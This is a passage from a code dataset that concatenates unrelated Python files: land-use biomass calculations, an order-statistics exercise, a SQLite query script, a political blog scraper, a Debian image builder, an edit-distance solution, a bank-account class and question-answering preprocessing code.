ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1, subset_arr=subset_arr)\n\n for idx, yr in enumerate([start_yr, end_yr]):\n # Get the ascii array\n arr_ssmb = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gssmb.' +\n str(yr) + '.txt', skiprows=6)\n arr_othr = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gothr.' +\n str(yr) + '.txt', skiprows=6)\n arr_secd = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gsecd.' +\n str(yr) + '.txt', skiprows=6)\n\n # Subset by lat lon boundary\n ssmb = util.extract_from_ascii(arr_ssmb, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n othr = util.extract_from_ascii(arr_othr, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n secd = util.extract_from_ascii(arr_secd, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n\n # Secondary biomass = secondary * cell_area * secondary biomass density\n secdf_biom = np.ma.sum(secd * carea * ssmb)\n\n # Primary biomass = primary * cell_area * primary biomass density\n primf_biom = np.ma.sum(othr * carea * vba)\n\n # Add secondary and primary biomass\n list_tot_biom.append(np.ma.sum(secdf_biom + primf_biom))\n\n # Compute difference in biomass\n cum_emissions = list_tot_biom[1] - list_tot_biom[0]\n\n return cum_emissions\n\n\ndef get_LUH1_secma(do_forest=True, yr=2005, name_LUH1='LUHa_u2.v1', subset_arr=None):\n \"\"\"\n\n Args:\n do_forest:\n yr:\n subset_arr:\n\n Returns:\n\n \"\"\"\n ssma = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gssma.' + str(yr) +\n '.txt', skiprows=6)\n\n # Subset by forest/non-forest map\n if do_forest:\n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba * (vba > 0.01) + (vba < 0.01) * 0.01 # Set least value of vba to 0.01\n\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n\n ssma = np.ma.masked_where(fnf <= 0.0, ssma)\n\n return ssma\n\n\ndef diag_LUH1(start_yr=1500, end_yr=2005, do_extend=True, name_LUH1='LUHa_u2.v1'):\n \"\"\"\n gflcp : fraction of each gridcell that transitioned from cropland to pasture\n gflcs : fraction of each gridcell that transitioned from cropland to secondary land\n gflcu : fraction of each gridcell that transitioned from cropland to urban land - for LUHa_u2.v1\n gflpc : fraction of each gridcell that transitioned from pasture to cropland\n gflps : fraction of each gridcell that transitioned from pasture to secondary land\n gflpu : fraction of each gridcell that transitioned from pasture to urban land - for LUHa_u2.v1\n gflsc : fraction of each gridcell that transitioned from secondary land to cropland\n gflsp : fraction of each gridcell that transitioned from secondary land to pasture\n gflsu : fraction of each gridcell that transitioned from secondary land to urban land - for LUHa_u2.v1\n gfluc : fraction of each gridcell that transitioned from urban land to cropland - for LUHa_u2.v1\n gflup : fraction of each gridcell that transitioned from urban land to pasture - for LUHa_u2.v1\n gflus : fraction of each gridcell that transitioned from urban land to secondary land - for LUHa_u2.v1\n gflvc : fraction of each gridcell that transitioned from primary land to cropland\n gflvp : fraction of each gridcell that transitioned from primary land to pasture\n gflvu : fraction of each gridcell that transitioned from primary land to urban land - for LUHa_u2.v1\n gfsh1 : fraction of each gridcell that had wood harvested from mature secondary forested land\n gfsh2 : fraction of each gridcell that had wood harvested from young secondary forested land\n gfsh3 : fraction of each gridcell that had wood harvested from secondary non-forested land\n gfvh1 : fraction of each gridcell that had wood harvested from primary forested land\n gfvh2 : fraction of each gridcell that had wood harvested from primary non-forested land\n Args:\n start_yr:\n end_yr:\n do_extend:\n\n Returns:\n\n \"\"\"\n path_base = constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/'\n carea = util.open_or_die(constants.CELL_AREA_H)\n halfdeg = util.open_or_die(constants.input_dir + os.sep + '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba*(vba > 0.01) + (vba < 0.01)*0.01 # Set least value of vba to 0.01\n\n icew = util.open_or_die(constants.input_dir + os.sep + '/gicew.1700.txt', skiprows=6)\n\n cum_net_C = []\n gross_trans = []\n net_trans = []\n sec_area = []\n sec_age = []\n wh = []\n global_biom = vba * (1 - icew) * carea\n\n for yr in tqdm(range(start_yr, end_yr), desc='diag_LUH1'):\n secd = abs(util.open_or_die(path_base + 'gsecd.' + str(yr) + '.txt', skiprows=6))\n ssmb = abs(util.open_or_die(path_base + 'gssmb.' + str(yr) + '.txt', skiprows=6))\n ssma = abs(util.open_or_die(path_base + 'gssma.' + str(yr) + '.txt', skiprows=6))\n othr = abs(util.open_or_die(path_base + 'gothr.' + str(yr) + '.txt', skiprows=6))\n crop = abs(util.open_or_die(path_base + 'gcrop.' + str(yr) + '.txt', skiprows=6))\n past = abs(util.open_or_die(path_base + 'gpast.' + str(yr) + '.txt', skiprows=6))\n flcp = abs(util.open_or_die(path_base + 'gflcp.' + str(yr) + '.txt', skiprows=6))\n flpc = abs(util.open_or_die(path_base + 'gflpc.' + str(yr) + '.txt', skiprows=6))\n flsp = abs(util.open_or_die(path_base + 'gflsp.' + str(yr) + '.txt', skiprows=6))\n flps = abs(util.open_or_die(path_base + 'gflps.' + str(yr) + '.txt', skiprows=6))\n flsc = abs(util.open_or_die(path_base + 'gflsc.' + str(yr) + '.txt', skiprows=6))\n flcs = abs(util.open_or_die(path_base + 'gflcs.' + str(yr) + '.txt', skiprows=6))\n flvc = abs(util.open_or_die(path_base + 'gflvc.' + str(yr) + '.txt', skiprows=6))\n flvp = abs(util.open_or_die(path_base + 'gflvp.' + str(yr) + '.txt', skiprows=6))\n fvh1 = abs(util.open_or_die(path_base + 'gfvh1.' + str(yr) + '.txt', skiprows=6))\n fvh2 = abs(util.open_or_die(path_base + 'gfvh2.' + str(yr) + '.txt', skiprows=6))\n fsh1 = abs(util.open_or_die(path_base + 'gfsh1.' + str(yr) + '.txt', skiprows=6))\n fsh2 = abs(util.open_or_die(path_base + 'gfsh2.' + str(yr) + '.txt', skiprows=6))\n fsh3 = abs(util.open_or_die(path_base + 'gfsh3.' + str(yr) + '.txt', skiprows=6))\n\n to_cp = flsp + flsc + flvc + flvp # primary/secondary to cropland/pasture\n to_sc = flps + flcs # cropland/pasture to secondary\n fvhb = fvh1 + fvh2 # wood harvested from primary forested/non-forested land\n fshb = fsh1 + fsh2 + fsh3 # wood harvested from secondary mature/young forested and non-forested land\n\n cum_net_C.append(np.ma.sum(np.ma.sum(global_biom)) * 1e6 * 1e3 / 1e15 -\n np.ma.sum(np.ma.sum(secd * carea * ssmb + othr * carea * vba)) * 1e6 * 1e3 / 1e15)\n gross_trans.append(np.ma.sum(np.ma.sum((to_cp + to_sc + flcp + flpc + fvhb + fshb) * carea)))\n net_trans.append(np.ma.sum(np.ma.sum((to_cp - to_sc + fvhb) * carea)))\n sec_area.append(np.ma.sum(np.ma.sum(secd * carea)))\n sec_age.append(np.ma.sum(np.ma.sum(secd * ssma * carea))/sum(sum((secd + 1e-12) * carea)))\n wh.append(np.ma.sum(fvhb + fshb)*carea)\n\n if do_extend:\n cum_net_C = add_to_list(cum_net_C, start_yr, end_yr)\n gross_trans = add_to_list(gross_trans, start_yr, end_yr)\n net_trans = add_to_list(net_trans, start_yr, end_yr)\n sec_area = add_to_list(sec_area, start_yr, end_yr)\n sec_age = add_to_list(sec_age, start_yr, end_yr)\n wh = add_to_list(wh, start_yr, end_yr)\n\n return cum_net_C, gross_trans, net_trans, sec_area, sec_age, wh\n\nif __name__ == '__main__':\n pass\n","sub_path":"GLM/process_luh1.py","file_name":"process_luh1.py","file_ext":"py","file_size_in_byte":26427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"526850639","text":"from random import randint\nfrom partitions import hoare_partition\nfrom math import ceil\n\ndef get_order_statistics(list, start, end, order):\n while start < end:\n pivot_value = get_pivot_by_five(list, start, end)\n pivot = hoare_partition(list, start, end, pivot_value)\n if pivot - start > order - 1:\n return get_order_statistics(list, start, pivot - 1, order)\n else:\n order -= pivot - start\n start = pivot\n if order == 1:\n return list[start]\n\n\ndef selection_sort(list, start, end):\n if start < len(list):\n for i in range(start, min(end, len(list))):\n minimum = i\n for j in range(i+1, min(end+1, len(list))):\n if list[j] < list[minimum]:\n minimum = j\n list[i], list[minimum] = list[minimum], list[i]\n\n\ndef get_pivot_by_five(list, start, end):\n order_of_pack = 0\n length = end - start + 1\n if length < 3:\n return list[end]\n while 2 + (order_of_pack * 5) < length:\n selection_sort(list, order_of_pack * 5, order_of_pack * 5 + 4)\n order_of_pack += 1\n medians = [v for i, v in enumerate(list[start:end+1]) if i in range(2, length, 5)]\n return get_order_statistics(medians, 0, len(medians)-1, ceil(len(medians)/2))\n\n\n\n\na = [1,2]\nfor i in range(len(a)):\n i += 1\n print(get_order_statistics(a, 0, len(a)-1, i))","sub_path":"order_statistics.py","file_name":"order_statistics.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"106011916","text":"import pandas as pd\nfrom sqlalchemy import create_engine\nengine = create_engine('sqlite://', echo=False)\ndf = pd.read_csv('buddymove_holidayiq.csv')\ndf.to_sql(name='review',con=engine)\n\nengine.execute('SELECT count(Sports) FROM review').fetchall()\nengine.execute('''SELECT count(Sports)\nFROM review as r\nWHERE (r.Nature >= 100) AND (r.Shopping > 100)\n''').fetchall()\n\nprint(engine.execute('''SELECT AVG(Sports), AVG(Religious), AVG(Nature), AVG(Theatre), AVG(Shopping), AVG(Picnic)\nFROM review as r\n''').fetchall())","sub_path":"module1-introduction-to-sql/buddymove_holidayiq.py","file_name":"buddymove_holidayiq.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"94257024","text":"################################################################################\n# Will Macxy\n# Hot Air Blog Scraper\n# Last Updated : 4/22/2021\n################################################################################\n\nfrom bs4 import BeautifulSoup as s\nfrom urllib.request import Request, urlopen\nimport sys\nimport re\nimport csv\n\n\n# Main function to scrap individual blogs, used by the main function\ndef scrape(url,status,root):\n\n\treq = Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n\n\twebpage = urlopen(req).read()\n\n\tsoup = s(webpage, \"lxml\")\t\n\n\t#variable names\n\ttitle = soup.find('title')\n\tdate = re.findall(r'[0-9][0-9][0-9][0-9]\\/[0-9][0-9]\\/[0-9][0-9]',url)\n\tauthor = soup.find('meta', attrs={'name':'author'})\n\tbody = soup.find_all('p')\n\tbody = body[:-1]\n\n\t#cleaning of text\n\ttextTitle = title.get_text().replace(',','')[:-8]\n\ttextDate = date[0].replace('/','-')\n\ttextAuthor = author['content']\n\n\ttextBody = textTitle + ', '+ textAuthor + \", \" + textDate + \", \"\n\n\t#creation of text body\n\tfor text in body:\n\t\ttextBody = textBody + text.get_text().replace(',','')+' '\n\n\ttextBody = 'C, ' + textBody + '\\n'\n\t\n\t#creation of file and file name\n\tblogTitle = 'C HotAir '+textAuthor+' '+textTitle+'.csv'\n\tinvalid = '<>:\\\"\\\\|?*\\'/\\n'\n\tfor char in invalid:\n\t\tblogTitle = blogTitle.replace(char,'')\n\t\n\t#terminal output\n\tstep = '[+] HA: '+textTitle\n\tstatus['text'] = \"{}\".format(step)\n\troot.update()\n\n\t#wrint of file\n\tfile = open(sys.path[0]+\"/Blogs/SavedBlogs/\"+blogTitle , \"w+\", encoding = 'utf-8')\n\tfile.write(textBody)\n\tfile.close()\n\t\n\n\treturn('HotAir: '+textTitle)\n\n#main function, used to fine dynamic blog listing page\ndef main(status,root):\n\t\n\tfor i in range(1,3):\n\t\t#start page, 50 entries per page\n\t\tstartPage = i\n\t\t#number of blog posts on page request, 50 max\n\t\tnumPosts = 50\n\n\t\t#variable names\n\t\turl = 'https://hotair.com/page/'+str(startPage)+'?ordinal='+str(numPosts)\n\t\treq = Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n\t\twebpage = urlopen(req).read()\n\t\tsoup = s(webpage, \"html.parser\")\n\t\tlinks = soup.find_all(class_='wp-card__img mt-2')\n\t\tlinkList = []\n\t\t\n\t\t#loop that calls individual blog post urls\n\t\tfor link in links:\n\t\t\tlinkList.append(str('https://hotair.com') + link.find('a').get('href'))\n\n\t\t#loop that scrapes individual bloog posts\n\t\tfor link in linkList:\n\t\t\tscrape(link,status,root)\n\n\t\n\treturn()\n\n","sub_path":"Blogs/AHotAirScraper.py","file_name":"AHotAirScraper.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"587022101","text":"from debimgbuilder.builder import DebianBuilder, DebianRepo\n\n\nclass JessieImageBuilder(DebianBuilder):\n def __init__(self, image_name, base_path,\n mirror='http://httpredir.debian.org/debian',\n suite='jessie',\n variant='minbase',\n base_components=None,\n repo_sources=None):\n if base_components is None:\n base_components = ['main', 'contrib']\n if repo_sources is None:\n repo_sources = []\n super().__init__(\n image_name,\n base_path,\n mirror,\n suite,\n variant,\n base_components,\n repo_sources\n )\n\n def setup_apt_sources(self):\n super().setup_apt_sources()\n # Add jessie-updates\n self.repo_sources.append(\n DebianRepo(\n self.mirror,\n 'jessie-updates',\n self.base_components,\n )\n )\n\n\nclass JessieBackportsImageBuilder(JessieImageBuilder):\n def setup_apt_sources(self):\n super().setup_apt_sources()\n # Add jessie-backports\n self.repo_sources.append(\n DebianRepo(\n self.mirror,\n 'jessie-backports',\n self.base_components,\n )\n )\n","sub_path":"debimgbuilder/jessie.py","file_name":"jessie.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"137374968","text":"#! /usr/bin/python3\n\n# Copyright(c) 2019 note.jorhelp.cn\n\n# Authored by Jorhelp on: 2019年 06月 17日 星期一 20:29:45 CST\n\n# @desc: 最短编辑距离\n\n\n# 一共有三种操作:删除、插入、替换\n\nt=int(input().strip()) #测试次数\nfor ttt in range(t):\n la,lb=map(int, input().strip().split()) #两个串的长度\n a,b=input().strip().split() #两个串\n\n re=[[0]*(lb+1) for i in range(la+1)] #打表\n\n for i in range(la+1):\n for j in range(lb+1):\n # 如果第一个串为空,那么结果为插入的第二个串的长度\n if i==0:\n re[i][j]=j\n # 如果第二个串为空,结果为要删除的第一个串的长度\n elif j==0:\n re[i][j]=i\n\n # 如果两字符相等,那么无需编辑,结果为re[i-1][j-1]\n elif a[i-1]==b[j-1]:\n re[i][j]=re[i-1][j-1]\n\n # 如果不相等,找一种最简单的编辑方式\n else:\n re[i][j]=1+min(re[i][j-1], #插入\n re[i-1][j-1], #替换\n re[i-1][j]) #删除\n print(re[-1][-1])\n","sub_path":"DS_and_Algo/最短编辑距离.py","file_name":"最短编辑距离.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"381281343","text":"# -*- coding: utf-8 -*-\n\nimport pluggy\nimport buildpy_server\nfrom . import log\n\nlogger = log.get_logger(__name__)\n\nhookimpl = pluggy.HookimplMarker('buildpy-server')\n\n\n@hookimpl\ndef buildpyserver_add_parser_options(parser):\n build = parser.add_group(\"build options\")\n build.add_option(\"--version\", action=\"store_true\",\n help=\"show buildpy version (%s)\"\n % buildpy_server.__version__)\n","sub_path":"src/buildpy_server/parseroptions.py","file_name":"parseroptions.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"584069327","text":"# -*- coding: utf-8 -*-\n'''\nЗадание 7.3b\n\nСделать копию скрипта задания 7.3a.\n\nДополнить скрипт:\n- Запросить у пользователя ввод номера VLAN.\n- Выводить информацию только по указанному VLAN.\n\nОграничение: Все задания надо выполнять используя только пройденные темы.\n\n'''\nvlan_number = input('Input vlan number: ')\n\nwith open ('CAM_table.txt', 'r') as f:\n for line in f:\n line = line.split()\n if line == []:\n continue\n if line[0].isdigit() and line[0] == vlan_number:\n line.pop(2)\n line = \" \".join(line)\n print(line)\n else:\n continue\n","sub_path":"exercises/07_files/task_7_3b.py","file_name":"task_7_3b.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"357079082","text":"class BankAccount():\n def __init__(self, balance, int_rate): \n self.balance=balance\n self.int_rate=0.01\n def deposit(self, amount):\n self.balance+=amount\n return self\n def withdrawal(self, amount):\n if(amount>self.balance):\n print(\"Insufficient funds: Charging a $5 fee\")\n self.balance-=5\n return self\n else:\n self.balance-=amount\n return self\n def display_account_info(self):\n print(self.balance)\n def yield_interest(self):\n if self.balance>0:\n self.balance= self.balance+(self.balance*self.int_rate)\n return self\n return self\n\ncerryl= BankAccount(90,0.01)\nleyladin= BankAccount(2000,0.03)\n\n\ncerryl.deposit(500).deposit(2500).deposit(3500).withdrawal(1500).yield_interest().display_account_info()\n\nleyladin.deposit(2500).deposit(700).withdrawal(200).withdrawal(500).withdrawal(800).withdrawal(400).yield_interest().display_account_info()","sub_path":"Python_Assignments/pythonPractice.py","file_name":"pythonPractice.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"332903004","text":"# constructor and self\n\n# object kan siam apiang khan space tharah a in allocate thin.\nclass New:\n pass\n\n\nc1 = New()\nprint(id(c1))\n\n\n# update dan kan lo zir ang\nclass Update:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def update(self):\n self.age = 25\n print('name:',self.name, 'age:',self.age)\n\n\na = Update('Hpa', 20)\na.update()\n\n# a dan dang chiin aw\nclass Exupdate:\n def __init__(self):\n self.name = 'rpa'\n self.age = 29\n def exup(self):\n self.age = 30\n print('name:',self.name, 'age:', self.age)\nb = Exupdate()\nb.name = 'John'\nb.exup()\n","sub_path":"object oriented/constructor and self.py","file_name":"constructor and self.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"406411772","text":"# coding=utf-8\n\nfrom django.views.generic import TemplateView\n\nfrom django.utils.http import urlencode\n\nclass BaseView(TemplateView):\n '''\n 后台管理View基类\n by:范俊伟 at:2015-01-21\n 前台界面基类,默认不需要登录\n by:王健 at:2015-01-25\n '''\n\n # 是否需要登录,默认需要登录\n # by:范俊伟 at:2015-01-21\n # 默认不需要登录\n # by:范俊伟 at:2015-01-21\n need_site_permission = False\n\n # 页面模板\n # by:范俊伟 at:2015-01-21\n template_name = 'webhtml/base.html'\n\n def get_context_data(self, **kwargs):\n '''\n 获取模板所需的变量\n by:范俊伟 at:2015-01-21\n 客服系统所需变量\n by: 范俊伟 at:2015-05-21\n '''\n kwargs = super(BaseView, self).get_context_data(**kwargs)\n kwargs['url'] = self.request.get_full_path()\n # kwargs['kf_url'] = settings.NEED_KF_BASE_URL\n kwargs['sessionid'] = self.request.session.session_key\n if hasattr(self, 'form'):\n kwargs['form'] = self.form\n return kwargs\n\n def get_query_string(self, new_params=None, remove=None):\n '''\n 返回当前url的查询参数(query string)\n by:范俊伟 at:2015-01-21\n :param new_params:所要添加的新参数,以dic形式提供\n :param remove:所要去除的字段,以array形式提供\n '''\n if new_params is None:\n new_params = {}\n if remove is None:\n remove = []\n p = dict(self.request.GET.items()).copy()\n for r in remove:\n for k in p.keys():\n if k.startswith(r):\n del p[k]\n for k, v in new_params.items():\n if v is None:\n if k in p:\n del p[k]\n else:\n p[k] = v\n qs = urlencode(p)\n if qs:\n return '?%s' % qs\n else:\n return ''\n\n def isPhoneRequest(self):\n \"\"\"\n 判断是否为手机请求\n by: 范俊伟 at:2015-03-11\n \"\"\"\n if self.kwargs.get('isPhone'):\n return True\n elif self.kwargs.get('isPC'):\n return False\n elif self.request.browserGroup == 'smart_phone' or self.request.browserGroup == 'feature_phone':\n return True\n else:\n return False\n\n def isSmartPhone(self):\n \"\"\"\n 判断是否是智能手机\n by: 尚宗凯 at: 2015-03-27\n \"\"\"\n if self.request.browserGroup == 'smart_phone':\n return True\n else:\n return False\n\n # @classonlymethod\n # @admin_view_decorator\n def as_view(cls, **initkwargs):\n '''\n 创建url文件中所需的view方法\n by:范俊伟 at:2015-01-21\n '''\n return super(BaseView, cls).as_view(**initkwargs)","sub_path":"util/baseview.py","file_name":"baseview.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"464716378","text":"from collections import Counter\nfrom typing import Dict, List\n\nimport config\n\n\ndef filter_rating_values(contents: List[str], most: bool) -> int:\n \"\"\"Filter ratings until one line in contents is left.\n\n Return the integer representation of the last line.\n\n Args:\n contents (List[str]): the file contents\n most (bool): whether to take the most or least of counter;\n if True and both counts of 0 and 1 are equal, 1 is taken\n\n Returns:\n int: integer representation of last matching line\n\n \"\"\"\n for col, _ in enumerate(contents[0]):\n if len(contents) == 1:\n return int(contents[0], base=2)\n\n col_contents = [line[col] for line in contents]\n count = Counter(col_contents)\n most_common = count.most_common(1)[0]\n\n if most_common[0] == '1' or count['1'] == most_common[1]:\n value = '1' if most else '0'\n else:\n value = '0' if most else '1'\n\n contents = [line for line in contents if line[col] == value]\n\n return int(contents[0], base=2)\n\n\ndef determine_life_support_rating(contents: List[str]) -> int:\n \"\"\"Determine life support rating by multiplying OGR by CO2SR.\n\n OGR is \"oxygen generator rating\".\n CO2SR is \"CO2 scrubber rating\".\n\n Args:\n contents (List[str]): the file contents\n\n Returns:\n int: life support rating\n\n \"\"\"\n oxygen_generator_rating = filter_rating_values(contents, True)\n co2_scrubber_rating = filter_rating_values(contents, False)\n\n return oxygen_generator_rating * co2_scrubber_rating\n\n\ndef main() -> None:\n \"\"\"Run the main code.\"\"\"\n test_answer = 230\n test_file = config.TestFile(test_answer)\n test = determine_life_support_rating(test_file.contents)\n test_file.test(test)\n\n file = config.File()\n result = determine_life_support_rating(file.contents)\n config.LOGGER.info(result)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"2021/03/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"612845197","text":"# import for python 2.7\n#from io import open\n#\nimport itertools\nimport scipy.sparse as sparse\nfrom MemNN.common import split_line, clean_words\n\ndef process_fact(line):\n # Arg: \"entity \\t rel \\t obj1 obj2 ob3 ...\"\n # Return: (entity rel obj1 obj2 obj3 ....)\n [entity, rel, obj] = line.rstrip().split('\\t')\n return entity, rel, obj.split(' ')\n\n\ndef symbols_bag(kb):\n \"\"\"\n\n Note:\n collect symbols from knowledge base\n\n Args:\n kb : knowledge base's path\n\n Returns:\n symbol_list, symbol2index\n\n \"\"\"\n print (\"processing Knowledge base to bag-of-symbole\")\n\n # symbol_list\n all_symbol = set()\n with open(kb, encoding=\"utf8\") as f_in:\n for l in f_in:\n entity, rel, objs = process_fact(l)\n all_symbol.update([entity, rel])\n all_symbol.update(objs)\n symbol_list = list(all_symbol)\n print (\"%d symbols have been processed\" % len(symbol_list))\n symbol_list.sort()\n\n # symbol2index\n symbol2index = {}\n symbol2index.update(zip(symbol_list, itertools.count()))\n return symbol_list, symbol2index\n\n\ndef ngram_bag(corpus_list, labels):\n \"\"\"\n\n Note:\n collect ngrams from dataset\n\n Args:\n corpus_list: list of dataset similar to SimpleQuestion train/test/valid\n labels: labels of entity in Knowledge base\n\n Returns:\n vocabulary, voc2index\n\n \"\"\"\n # vocabulary\n print (\"processing corpus to bag-of-words\")\n words = set()\n line_ctr = itertools.count()\n\n # words in questions\n for ds in corpus_list:\n with open(ds, encoding=\"utf8\") as in_f:\n for line in in_f:\n try:\n line_number = next(line_ctr)\n words.update(clean_words(split_line(line)))\n except IndexError:\n print (\"Index Error in line %d\" % line_number)\n\n # word in labels\n for l in labels:\n words.update(l.split())\n vocabulary = list(words)\n print (\"%d words have been processed\" % len(vocabulary))\n vocabulary.sort()\n\n # voc2index\n voc2index = {}\n voc2index.update(zip(vocabulary, itertools.count()))\n return vocabulary, voc2index\n\n# preprocessing Freebase facts: transform a fact (s, r, {o1, ... ok} to vector with a bag-of-symbole\ndef f_y(symbols2index, kb):\n \"\"\"\n\n Note:\n preprocessing knowledge base\n\n Args:\n symbols2index: mapping object\n kb: knowledge base's path\n\n Returns:\n mx: knowledge matrix\n knowledgebase_size: number of facts \n candidate_mx: subject and relationship matrix\n responses: mapping number of fact to objects\n\n \"\"\"\n line_ctr = itertools.count()\n data_tuples = list()\n responses = dict()\n candidate_tuple = list()\n\n with open(kb, encoding=\"utf8\") as f_in:\n for l in f_in:\n entity, rel, objs = process_fact(l)\n l = next(line_ctr)\n data_tuples.append((1.0, l, symbols2index[entity]))\n data_tuples.append((1.0, l, symbols2index[rel]))\n candidate_tuple.append((1.0, l, symbols2index[entity]))\n candidate_tuple.append((1.0, l, symbols2index[rel]))\n data_tuples.extend([(1./len(objs), l, symbols2index[o]) for o in objs])\n responses[l] = objs\n data, row, col = zip(*data_tuples)\n candidate_data, candidate_row, candidate_col = zip(*candidate_tuple)\n\n knowledgebase_size = next(line_ctr)\n symbol_size = len(symbols2index.keys())\n\n mx = sparse.csr_matrix((data, (row, col)), shape=(knowledgebase_size,symbol_size))\n candidate_mx = sparse.csr_matrix((candidate_data, (candidate_row, candidate_col)), shape=(knowledgebase_size,symbol_size))\n return mx, knowledgebase_size, candidate_mx, responses\n\ndef f_y_facts(symbols2index, dataset):\n \"\"\"\n\n Note:\n preprocessing facts in dataset\n\n Args:\n symbols2index: mapping object\n dataset: dataset similar to SimpleQuestion train/valid/test\n\n Returns:\n mx: fact matrice\n\n \"\"\"\n line_ctr = itertools.count()\n data_tuples = list()\n for l in dataset:\n entity, rel, obj, question = l.rstrip().split('\\t')\n l = next(line_ctr)\n data_tuples.append((1.0, l, symbols2index[entity]))\n data_tuples.append((1.0, l, symbols2index[rel]))\n data_tuples.append((1.0, l, symbols2index[obj]))\n\n data, row, col = zip(*data_tuples)\n mx = sparse.csr_matrix((data, (row, col)))\n return mx\n\ndef g_q(symbols2index, voc2index, dataset):\n \"\"\"\n\n Note:\n preprocessing dataset\n\n Args:\n symbols2index: map symbol to index\n voc2index: map word to index\n dataset: dataset similar to SimpleQuestion train/valid/test\n\n Returns:\n f_mx: fact matrice\n q_mx: question matrice\n M: number of records in dataset\n\n \"\"\"\n line_ctr = itertools.count()\n data_tuples = list()\n fact_tuples = list()\n with open(dataset, encoding=\"utf8\") as in_f:\n for line in in_f:\n l = next(line_ctr)\n fact_tuples.extend([(1, l, symbols2index[s]) for s in line.split(\"\\t\")[0:3]])\n data_tuples.extend([(1, l, voc2index[w]) for w in clean_words(split_line(line))])\n\n f_data, f_row, f_col = zip(*fact_tuples)\n q_data, q_row, q_col = zip(*data_tuples)\n M = next(line_ctr)\n N = len(symbols2index.keys())\n O = len(voc2index.keys())\n\n f_mx = sparse.csr_matrix((f_data, (f_row, f_col)), shape=(M, N))\n q_mx = sparse.csr_matrix((q_data, (q_row, q_col)), shape=(M, O))\n return f_mx, q_mx, M\n\ndef g_q_single_question(voc2index, question):\n \"\"\"\n\n Note:\n preprocessing single question\n\n Args:\n voc2index: map word to index\n question: question in natural language\n\n Returns:\n q_mx: question vector\n\n \"\"\"\n data_tuples = list()\n\n data_tuples.extend([(1, 0, voc2index[w]) for w in clean_words(question.strip().lower().split(' ')) if voc2index[w]])\n q_data, q_row, q_col = zip(*data_tuples)\n\n O = len(voc2index.keys())\n\n q_mx = sparse.csr_matrix((q_data, (q_row, q_col)), shape=(1, O))\n return q_mx\n\ndef negative_exemples_generation(symbols2index, kb):\n \"\"\"\n\n Note:\n generate negative examples from knowledge base\n\n Args:\n symbols2index: map symbol to index\n kb: knowledge base's path\n\n Returns:\n mx: negative example matrice\n M: number of negative examples\n\n \"\"\"\n line_ctr = itertools.count()\n data_tuples = list()\n with open(kb, encoding=\"utf8\") as f_in:\n for l in f_in:\n entity, rel, objs = process_fact(l)\n for o in objs:\n l = next(line_ctr)\n data_tuples.append((1.0, l, symbols2index[entity]))\n data_tuples.append((1.0, l, symbols2index[rel]))\n data_tuples.append((1.0, l, symbols2index[o]))\n\n data, row, col = zip(*data_tuples)\n M = next(line_ctr)\n N = len(symbols2index.keys())\n mx = sparse.csr_matrix((data, (row, col)), shape=(M,N))\n return mx, M\n\n","sub_path":"MemNN/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":7035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"435162603","text":"#/bin/env python3\n\nimport cv2,sys\nimport numpy as np\nfrom PIL import Image\nfrom pytesseract import image_to_string\n\ndef dist_line(p1,p2,p3):\n x1,y1 = p1[0]\n x2,y2 = p2[0]\n x0,y0 = p3[0]\n return ((y2 - y1) * x0 - (x2 - x1) * y0 + x2*y1 - y2*x1) / np.sqrt((y2-y1)**2 + (x2 - x1) ** 2)\n\ndef fix_poly(polygon):\n ret = np.array([ [0,0],[0,0],[0,0],[0,0] ],np.float32)\n min_ = 